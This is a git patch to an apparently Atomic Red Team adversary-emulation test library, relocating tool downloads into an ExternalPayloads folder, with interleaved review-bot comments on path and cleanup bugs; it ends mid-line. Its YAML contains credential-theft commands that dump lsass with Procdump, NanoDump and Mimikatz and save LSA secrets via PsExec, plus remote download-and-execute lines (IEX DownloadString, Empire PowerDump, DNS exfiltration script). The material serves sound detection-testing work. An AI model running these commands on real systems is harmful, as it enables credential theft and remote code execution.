From 068d32b1ea81b7fe81be006b2f989b998dad20ae Mon Sep 17 00:00:00 2001
From: Carrie Roberts
Date: Thu, 15 Jun 2023 09:16:12 -0700
Subject: [PATCH] use ExternalPayloads directory (#2460)
* use ExternalPayloads directory
* use ExternalPayloads directory
* use ExternalPayloads directory
---
atomics/T1003.001/T1003.001.yaml | 32 ++++++++------
atomics/T1003.002/T1003.002.yaml | 6 +--
atomics/T1003.004/T1003.004.yaml | 8 ++--
atomics/T1021.002/T1021.002.yaml | 9 ++--
atomics/T1021.006/T1021.006.yaml | 5 ++-
atomics/T1027/T1027.yaml | 17 ++++----
atomics/T1040/T1040.yaml | 10 +++--
atomics/T1046/T1046.yaml | 5 ++-
atomics/T1047/T1047.yaml | 9 ++--
atomics/T1048.002/T1048.002.yaml | 9 ++--
atomics/T1048/T1048.yaml | 3 +-
atomics/T1055/T1055.yaml | 9 ++--
atomics/T1059.003/T1059.003.yaml | 4 +-
atomics/T1069.001/T1069.001.yaml | 3 +-
atomics/T1070.006/T1070.006.yaml | 6 +--
atomics/T1071.001/T1071.001.yaml | 11 ++---
atomics/T1072/T1072.yaml | 10 +++--
atomics/T1082/T1082.yaml | 9 ++--
atomics/T1083/T1083.yaml | 10 ++---
atomics/T1087.002/T1087.002.yaml | 22 +++++----
atomics/T1090.003/T1090.003.yaml | 7 +--
atomics/T1095/T1095.yaml | 4 +-
atomics/T1105/T1105.yaml | 56 ++++++++++++------------
atomics/T1110.001/T1110.001.yaml | 15 ++++---
atomics/T1110.002/T1110.002.yaml | 19 +++++----
atomics/T1110.003/T1110.003.yaml | 26 ++++++------
atomics/T1110.004/T1110.004.yaml | 17 ++++----
atomics/T1133/T1133.yaml | 5 ++-
atomics/T1134.001/T1134.001.yaml | 18 ++++----
atomics/T1134.005/T1134.005.yaml | 3 +-
atomics/T1135/T1135.yaml | 7 +--
atomics/T1187/T1187.yaml | 3 +-
atomics/T1207/T1207.yaml | 12 +++---
atomics/T1219/T1219.yaml | 24 +++++++----
atomics/T1482/T1482.yaml | 9 ++--
atomics/T1485/T1485.yaml | 11 ++---
atomics/T1486/T1486.yaml | 5 ++-
atomics/T1526/T1526.yaml | 9 ++--
atomics/T1528/T1528.yaml | 9 ++--
atomics/T1530/T1530.yaml | 13 +++--
atomics/T1539/T1539.yaml | 18 ++++----
atomics/T1546.015/T1546.015.yaml | 12 ++++--
atomics/T1547.008/T1547.008.yaml | 3 +-
atomics/T1548.002/T1548.002.yaml | 73 ++++++++++++++++++--------------
atomics/T1550.003/T1550.003.yaml | 40 ++++++++--------- atomics/T1555.003/T1555.003.yaml | 71 ++++++++++++++++--------------- atomics/T1558.001/T1558.001.yaml | 3 +- atomics/T1558.002/T1558.002.yaml | 3 +- atomics/T1558.003/T1558.003.yaml | 3 +- atomics/T1558.004/T1558.004.yaml | 3 +- atomics/T1560.001/T1560.001.yaml | 5 ++- atomics/T1562.001/T1562.001.yaml | 35 ++++++++------- atomics/T1562.006/T1562.006.yaml | 7 +-- atomics/T1564.006/T1564.006.yaml | 9 ++-- atomics/T1567.002/T1567.002.yaml | 13 +++--- atomics/T1569.002/T1569.002.yaml | 31 ++++++-------- 56 files changed, 430 insertions(+), 368 deletions(-) diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml index 366e622a..011aac54 100644 --- a/atomics/T1003.001/T1003.001.yaml +++ b/atomics/T1003.001/T1003.001.yaml @@ -20,7 +20,7 @@ atomic_tests: procdump_exe: description: Path of Procdump executable type: path - default: PathToAtomicsFolder\T1003.001\bin\procdump.exe + default: PathToAtomicsFolder\..\ExternalPayloads\procdump.exe dependency_executor_name: powershell dependencies: - description: | 
@@ -29,10 +29,11 @@ atomic_tests: if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" - Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip PathToAtomicsFolder\..\ExternalPayloads\Procdump -Force New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null - Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force + Copy-Item PathToAtomicsFolder\..\ExternalPayloads\Procdump\Procdump.exe #{procdump_exe} -Force executor: command: | #{procdump_exe} -accepteula -ma lsass.exe #{output_file} @@ -70,7 +71,7 @@ atomic_tests: dumpert_exe: description: Path of Dumpert executable type: path - default: PathToAtomicsFolder\T1003.001\bin\Outflank-Dumpert.exe + default: PathToAtomicsFolder\..\ExternalPayloads\Outflank-Dumpert.exe dependency_executor_name: powershell dependencies: - description: | 
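Review bot: Quoting in the new Procdump get_prereq_command is inconsistent: `New-Item` and `Invoke-WebRequest` receive the ExternalPayloads path in double quotes, while the `Expand-Archive` and `Copy-Item` arguments are bare, so an atomics folder whose substituted path contains a space would break only the latter two. Quoting all four keeps them uniform, e.g. `Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip" "PathToAtomicsFolder\..\ExternalPayloads\Procdump" -Force` and `Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\Procdump\Procdump.exe" #{procdump_exe} -Force`. The same mixed quoting recurs in the second Procdump hunk of this file (@@ -259), the PsTools hunks of T1021.002 and T1055, the curl hunks of T1048.002 and T1071.001, and the DirLister hunk of T1083.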
@@ -102,12 +103,13 @@ atomic_tests: dependency_executor_name: powershell dependencies: - description: | - NanoDump executable must exist on disk at specified location ($env:TEMP\nanodump.x64.exe) + NanoDump executable must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe) prereq_command: | - if (Test-Path $env:TEMP\nanodump.x64.exe) {exit 0} else {exit 1} + if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - Invoke-WebRequest "https://github.com/helpsystems/nanodump/raw/84db0c1737bbe027431733c193cfacf59a07259b/compiled/nanodump.x64.exe" -OutFile "$env:TEMP\nanodump.x64.exe" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://github.com/helpsystems/nanodump/raw/84db0c1737bbe027431733c193cfacf59a07259b/compiled/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe" executor: command: | %temp%\nanodump.x64.exe -w "%temp%\nanodump.dmp" @@ -151,7 +153,7 @@ atomic_tests: mimikatz_exe: description: Path of the Mimikatz binary type: string - default: PathToAtomicsFolder\T1003.001\bin\x64\mimikatz.exe + default: PathToAtomicsFolder\..\ExternalPayloads\x64\mimikatz.exe dependency_executor_name: powershell dependencies: - description: | @@ -219,7 +221,7 @@ atomic_tests: description: | The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure powershell implementation that leverages the MiniDumpWriteDump Win32 API call. - Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp. + Upon successful execution, you should see the following file created $env:TEMP\lsass_*.dmp. Author of Out-Minidump: Matthew Graeber (@mattifestation) supported_platforms: 
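Review bot: The NanoDump executor on the last context line still runs `%temp%\nanodump.x64.exe -w "%temp%\nanodump.dmp"`, while the dependency now checks for and downloads the binary at `PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe`, so the prerequisite passes and the test then fails to find the executable. The executor command needs the same location, e.g. `"PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe" -w "%temp%\nanodump.dmp"`; the rest of that executor block lies outside the hunk. The two T1027 hunks in this commit have the identical dependency/executor mismatch.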
@@ -227,6 +229,7 @@ atomic_tests: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null IEX (New-Object Net.WebClient).DownloadString('https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1'); get-process lsass | Out-Minidump cleanup_command: | Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore @@ -251,7 +254,7 @@ atomic_tests: procdump_exe: description: Path of Procdump executable type: path - default: PathToAtomicsFolder\T1003.001\bin\procdump.exe + default: PathToAtomicsFolder..\ExternalPayloads\procdump.exe dependency_executor_name: powershell dependencies: - description: | @@ -259,10 +262,11 @@ atomic_tests: prereq_command: | if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" - Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip PathToAtomicsFolder\..\ExternalPayloads\Procdump -Force New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null - Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force + Copy-Item PathToAtomicsFolder\..\ExternalPayloads\Procdump\Procdump.exe #{procdump_exe} -Force executor: command: | #{procdump_exe} -accepteula -mm lsass.exe #{output_file} diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml index 158ff58a..5ec668a0 100644 --- a/atomics/T1003.002/T1003.002.yaml +++ b/atomics/T1003.002/T1003.002.yaml 
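Review bot: The `New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null` line added to this executor is not used by anything visible in the hunk: the script is pulled into memory with IEX, the description in the preceding hunk says the dump lands in `$env:TEMP\lsass_*.dmp`, and the cleanup removes from `$env:TEMP`. Unless Out-Minidump.ps1 (fetched remotely, not shown here) writes into that directory, the line should be dropped, since it is a prerequisite-style action placed in the attack step and alters what the executed command looks like to detection.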
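Review bot: The new default `PathToAtomicsFolder..\ExternalPayloads\procdump.exe` in the @@ -251 hunk is missing the backslash before `..`, so after substitution the path names a directory ending in `..` next to the atomics folder (or, depending on how Windows normalises trailing dots in a path component, somewhere else again) rather than ExternalPayloads, and the @@ -259 hunk below then copies Procdump to a different location than every other line in this file uses. It should read `default: PathToAtomicsFolder\..\ExternalPayloads\procdump.exe`, matching the same parameter in the @@ -20 hunk. The same missing backslash appears in T1047 (the three tightvncinstaller.msi paths in its @@ -199 hunk) and in the dirlister_path default of T1083's @@ -129 hunk.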
@@ -91,13 +91,13 @@ atomic_tests: - windows dependencies: - description: PowerDump script must exist on disk at specified location - prereq_command: 'if (Test-Path "$Env:Temp\PowerDump.ps1") {exit 0} else {exit 1} ' + prereq_command: 'if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1") {exit 0} else {exit 1} ' get_prereq_command: |- - Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1" + Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1" executor: command: |- Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green - Import-Module "$Env:Temp\PowerDump.ps1" + Import-Module "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1" Invoke-PowerDump name: powershell elevation_required: true diff --git a/atomics/T1003.004/T1003.004.yaml b/atomics/T1003.004/T1003.004.yaml index a2c915c1..3ad906ae 100644 --- a/atomics/T1003.004/T1003.004.yaml +++ b/atomics/T1003.004/T1003.004.yaml 
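Review bot: Unlike the other dependencies this commit touches, the PowerDump get_prereq_command writes to `PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1` without first creating the directory; `Invoke-Webrequest -OutFile` is not expected to create missing parent directories, so on a fresh host this prerequisite fails until some other test has created ExternalPayloads. Add the guard the other hunks use before the download: `New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null`.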
@@ -14,16 +14,16 @@ atomic_tests: psexec_exe: description: Path to PsExec executable type: path - default: PathToAtomicsFolder\T1003.004\bin\PsExec.exe + default: PathToAtomicsFolder\..\ExternalPayloads\T1003.004\bin\PsExec.exe dependency_executor_name: powershell dependencies: - description: PsExec from Sysinternals must exist on disk at specified location (#{psexec_exe}) prereq_command: 'if (Test-Path #{psexec_exe}) {exit 0} else {exit 1}' get_prereq_command: |- - Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PSTools.zip" - Expand-Archive $env:TEMP\PSTools.zip $env:TEMP\PSTools -Force + Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PSTools.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\PSTools.zip PathToAtomicsFolder\..\ExternalPayloads\PSTools -Force New-Item -ItemType Directory (Split-Path #{psexec_exe}) -Force | Out-Null - Copy-Item $env:TEMP\PSTools\PsExec.exe #{psexec_exe} -Force + Copy-Item PathToAtomicsFolder\..\ExternalPayloads\PSTools\PsExec.exe #{psexec_exe} -Force executor: command: '#{psexec_exe} -accepteula -s reg save HKLM\security\policy\secrets %temp%\secrets /y' cleanup_command: del %temp%\secrets >nul 2> nul diff --git a/atomics/T1021.002/T1021.002.yaml b/atomics/T1021.002/T1021.002.yaml index 7b2d71ab..80521983 100644 --- a/atomics/T1021.002/T1021.002.yaml +++ b/atomics/T1021.002/T1021.002.yaml @@ -69,7 +69,7 @@ atomic_tests: psexec_exe: description: Path to PsExec type: string - default: C:\PSTools\PsExec.exe + default: PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe dependency_executor_name: powershell dependencies: - description: | 
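Review bot: The new psexec_exe default keeps a per-technique subfolder, `PathToAtomicsFolder\..\ExternalPayloads\T1003.004\bin\PsExec.exe`, whereas T1021.002 and T1055 in this same commit place it at `PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe`, so PSTools is downloaded and expanded once per technique instead of being shared. `default: PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe` makes the three consistent. This get_prereq_command also lacks the `New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null` line the other PSTools hunks add, so the first Invoke-WebRequest can fail if ExternalPayloads does not exist yet.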
@@ -77,10 +77,11 @@ atomic_tests: prereq_command: | if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} get_prereq_command: | - Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" - Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip PathToAtomicsFolder\..\ExternalPayloads\PsTools -Force New-Item -ItemType Directory (Split-Path "#{psexec_exe}") -Force | Out-Null - Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force + Copy-Item PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe "#{psexec_exe}" -Force executor: command: | #{psexec_exe} #{remote_host} -accepteula -c #{command_path} diff --git a/atomics/T1021.006/T1021.006.yaml b/atomics/T1021.006/T1021.006.yaml index 0bc77ab6..de7240e9 100644 --- a/atomics/T1021.006/T1021.006.yaml +++ b/atomics/T1021.006/T1021.006.yaml 
@@ -52,8 +52,9 @@ atomic_tests: - description: Computer must have Ruby Installed prereq_command: try {if (ruby -v) {exit 0} else {exit 1}} catch {exit 1} get_prereq_command: |- - Invoke-WebRequest -OutFile $env:Temp\rubyinstaller-2.7.1-1-x64.exe https://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-2.7.1-1/rubyinstaller-2.7.1-1-x64.exe - $file1= $env:Temp + "\rubyinstaller-2.7.1-1-x64.exe" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest -OutFile PathToAtomicsFolder\..\ExternalPayloads\rubyinstaller-2.7.1-1-x64.exe https://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-2.7.1-1/rubyinstaller-2.7.1-1-x64.exe + $file1= "PathToAtomicsFolder\..\ExternalPayloads\rubyinstaller-2.7.1-1-x64.exe" Start-Process $file1 /S; - description: Computer must have Evil-WinRM installed prereq_command: try {if (evil-winrm -h) {exit 0} else {exit 1}} catch {exit 1} diff --git a/atomics/T1027/T1027.yaml b/atomics/T1027/T1027.yaml index 4ba4abdf..405a5fc7 100644 --- a/atomics/T1027/T1027.yaml +++ b/atomics/T1027/T1027.yaml 
@@ -101,13 +101,14 @@ atomic_tests: dependency_executor_name: powershell dependencies: - description: | - T1027.exe must exist on disk at $env:temp\temp_T1027.zip\T1027.exe + T1027.exe must exist on disk at PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\T1027.exe prereq_command: | - if (Test-Path $env:temp\temp_T1027.zip\T1027.exe) {exit 0} else {exit 1} + if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\T1027.exe) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - Invoke-WebRequest "#{url_path}" -OutFile "$env:temp\T1027.zip" - Expand-Archive -path "$env:temp\T1027.zip" -DestinationPath "$env:temp\temp_T1027.zip\" -Force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "#{url_path}" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1027.zip" + Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\T1027.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\" -Force executor: command: | "%temp%\temp_T1027.zip\T1027.exe" 
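Review bot: The dependency now extracts T1027.exe to `PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\`, but the executor on the last context line still runs `"%temp%\temp_T1027.zip\T1027.exe"`, so the prerequisite check passes and the test then cannot find the binary. The executor line needs the same path, `"PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\T1027.exe"`. The @@ -230 hunk for T1027js.js has the identical mismatch with `"%temp%\temp_T1027js.zip\T1027js.js"`.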
@@ -230,13 +231,13 @@ atomic_tests: dependency_executor_name: powershell dependencies: - description: | - T1027.js must exist on disk at $env:temp\temp_T1027js.zip\T1027js.js + T1027.js must exist on disk at PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\T1027js.js prereq_command: | - if (Test-Path $env:temp\temp_T1027js.zip\T1027js.js) {exit 0} else {exit 1} + if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\T1027js.js) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - Invoke-WebRequest "#{url_path}" -OutFile "$env:temp\T1027js.zip" - Expand-Archive -path "$env:temp\T1027js.zip" -DestinationPath "$env:temp\temp_T1027js.zip\" -Force + Invoke-WebRequest "#{url_path}" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1027js.zip" + Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\T1027js.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\" -Force executor: command: | "%temp%\temp_T1027js.zip\T1027js.js" diff --git a/atomics/T1040/T1040.yaml b/atomics/T1040/T1040.yaml index 7e7323f0..24662e65 100644 --- a/atomics/T1040/T1040.yaml +++ b/atomics/T1040/T1040.yaml 
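Review bot: This get_prereq_command downloads into `PathToAtomicsFolder\..\ExternalPayloads\` without the `New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null` guard that the @@ -101 hunk above and most other hunks in this commit add, so it depends on another test having created the directory first. Add the guard as the line after the TLS setting so the two T1027 dependencies behave the same way.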
@@ -91,14 +91,16 @@ atomic_tests: tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe". prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url} - Start-Process $env:temp\wireshark_installer.exe /S + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest -OutFile PathToAtomicsFolder\..\ExternalPayloads\wireshark_installer.exe #{wireshark_url} + Start-Process PathToAtomicsFolder\..\ExternalPayloads\wireshark_installer.exe /S - description: | npcap must be installed. prereq_command: if (test-path "#{npcap_path}") {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url} - Start-Process $env:temp\npcap_installer.exe + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest -OutFile PathToAtomicsFolder\..\ExternalPayloads\npcap_installer.exe #{npcap_url} + Start-Process PathToAtomicsFolder\..\ExternalPayloads\npcap_installer.exe executor: command: | "c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 diff --git a/atomics/T1046/T1046.yaml b/atomics/T1046/T1046.yaml index 9a26d547..6a4fe601 100644 --- a/atomics/T1046/T1046.yaml +++ b/atomics/T1046/T1046.yaml 
@@ -88,8 +88,9 @@ atomic_tests: NMap must be installed prereq_command: 'if (cmd /c "nmap 2>nul") {exit 0} else {exit 1}' get_prereq_command: | - Invoke-WebRequest -OutFile $env:temp\nmap-7.80-setup.exe #{nmap_url} - Start-Process $env:temp\nmap-7.80-setup.exe /S + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest -OutFile PathToAtomicsFolder\..\ExternalPayloads\nmap-7.80-setup.exe #{nmap_url} + Start-Process PathToAtomicsFolder\..\ExternalPayloads\nmap-7.80-setup.exe /S executor: command: |- nmap #{host_to_scan} diff --git a/atomics/T1047/T1047.yaml b/atomics/T1047/T1047.yaml index ab4ac887..283244d9 100644 --- a/atomics/T1047/T1047.yaml +++ b/atomics/T1047/T1047.yaml @@ -163,7 +163,7 @@ atomic_tests: dll_to_execute: description: Path to DLL. type: string - default: $env:TEMP\calc.dll + default: PathToAtomicsFolder\..\ExternalPayloads\calc.dll function_to_execute: description: Name of DLL function to call type: string @@ -173,6 +173,7 @@ atomic_tests: - description: DLL with function to execute must exist on disk at specified location (#{dll_to_execute}) prereq_command: 'if (Test-Path #{dll_to_execute}) {exit 0} else {exit 1}' get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/bin/calc.dll?raw=true" -OutFile "#{dll_to_execute}" executor: command: | 
@@ -199,12 +200,12 @@ atomic_tests: - description: TightVNC must be installed. prereq_command: if ((Test-Path "C:\Program Files\TightVNC\tvnviewer.exe")-Or (Test-Path "C:\Program Files (x86)\TightVNC\tvnviewer.exe")) {exit 0} else {exit 1} get_prereq_command: |- - Invoke-WebRequest 'https://www.tightvnc.com/download/2.8.63/tightvnc-2.8.63-gpl-setup-64bit.msi' -OutFile PathToAtomicsFolder\T1047\bin\tightvncinstaller.msi + Invoke-WebRequest 'https://www.tightvnc.com/download/2.8.63/tightvnc-2.8.63-gpl-setup-64bit.msi' -OutFile "PathToAtomicsFolder..\ExternalPayloads\tightvncinstaller.msi" start-sleep -s 10 - msiexec /i PathToAtomicsFolder\T1047\bin\tightvncinstaller.msi /qn /norestart + msiexec /i "PathToAtomicsFolder..\ExternalPayloads\tightvncinstaller.msi" /qn /norestart start-sleep -s 15 executor: command: wmic /node:"#{node}" product where "name like '#{product}%%'" call uninstall - cleanup_command: msiexec /i PathToAtomicsFolder\T1047\bin\tightvncinstaller.msi /qn /norestart + cleanup_command: msiexec /i "PathToAtomicsFolder..\ExternalPayloads\tightvncinstaller.msi" /qn /norestart name: command_prompt elevation_required: true diff --git a/atomics/T1048.002/T1048.002.yaml b/atomics/T1048.002/T1048.002.yaml index 719338b8..52f26a3e 100644 --- a/atomics/T1048.002/T1048.002.yaml +++ b/atomics/T1048.002/T1048.002.yaml 
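Review bot: The cleanup_command on the last changed line still runs `msiexec /i ... /qn /norestart`, which installs the package again rather than removing it, so the test leaves TightVNC on the host after cleanup even though the executor's purpose is to uninstall it. Cleanup should use the uninstall switch: `cleanup_command: msiexec /x "PathToAtomicsFolder\..\ExternalPayloads\tightvncinstaller.msi" /qn /norestart`. This predates the rename, but the line is rewritten here so it is the natural place to fix it.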
@@ -23,11 +23,10 @@ atomic_tests: prereq_command: | if (Test-Path #{curl_path}) {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile $env:temp\curl.zip - Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl - Copy-Item $env:temp\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe - Remove-Item $env:temp\curl - Remove-Item $env:temp\curl.zip + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile PathToAtomicsFolder\..\ExternalPayloads\curl.zip + Expand-Archive -Path PathToAtomicsFolder\..\ExternalPayloads\curl.zip -DestinationPath PathToAtomicsFolder\..\ExternalPayloads\curl + Copy-Item PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe - description: | #{input_file} must be exist on system. prereq_command: | diff --git a/atomics/T1048/T1048.yaml b/atomics/T1048/T1048.yaml index c918f282..86b28242 100644 --- a/atomics/T1048/T1048.yaml +++ b/atomics/T1048/T1048.yaml @@ -69,7 +69,7 @@ atomic_tests: ps_module: description: DNSExfiltrator powershell ps_module type: path - default: '$env:Temp\dnsexfil.ps1' + default: 'PathToAtomicsFolder\..\ExternalPayloads\dnsexfil.ps1' doh: description: Google or CloudFlare DoH (DNS over HTTP) server type: string @@ -89,6 +89,7 @@ atomic_tests: prereq_command: | if (Test-Path #{ps_module}) {exit 0} else {exit 1} get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null IWR "https://raw.githubusercontent.com/Arno0x/DNSExfiltrator/8faa972408b0384416fffd5b4d42a7aa00526ca8/Invoke-DNSExfiltrator.ps1" -OutFile #{ps_module} executor: command: | diff --git a/atomics/T1055/T1055.yaml b/atomics/T1055/T1055.yaml index 57636b73..7a3a01b3 100644 
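Review bot: With the extracted tree now kept under ExternalPayloads instead of a temp folder that was deleted afterwards, `Expand-Archive -Path PathToAtomicsFolder\..\ExternalPayloads\curl.zip -DestinationPath PathToAtomicsFolder\..\ExternalPayloads\curl` has no `-Force`, so a second run of the prerequisite (for example after the Copy-Item into System32 failed without elevation) errors because the destination already holds the files; add `-Force` as the other Expand-Archive calls in this commit do. The commit also drops the two Remove-Item lines here while the otherwise parallel T1071.001 hunk keeps them, which looks accidental. Note too that the copy target stays `C:\Windows\System32\Curl.exe`, replacing the OS-supplied curl, whereas the prereq_command tests `#{curl_path}` — whether those are the same location is not visible in the hunk and is worth confirming.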
--- a/atomics/T1055/T1055.yaml +++ b/atomics/T1055/T1055.yaml @@ -64,7 +64,7 @@ atomic_tests: psexec_path: description: Path to PsExec type: string - default: C:\PSTools\PsExec.exe + default: 'PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe' dependency_executor_name: powershell dependencies: - description: | @@ -86,10 +86,11 @@ atomic_tests: if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" -UseBasicParsing - Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" -UseBasicParsing + Expand-Archive 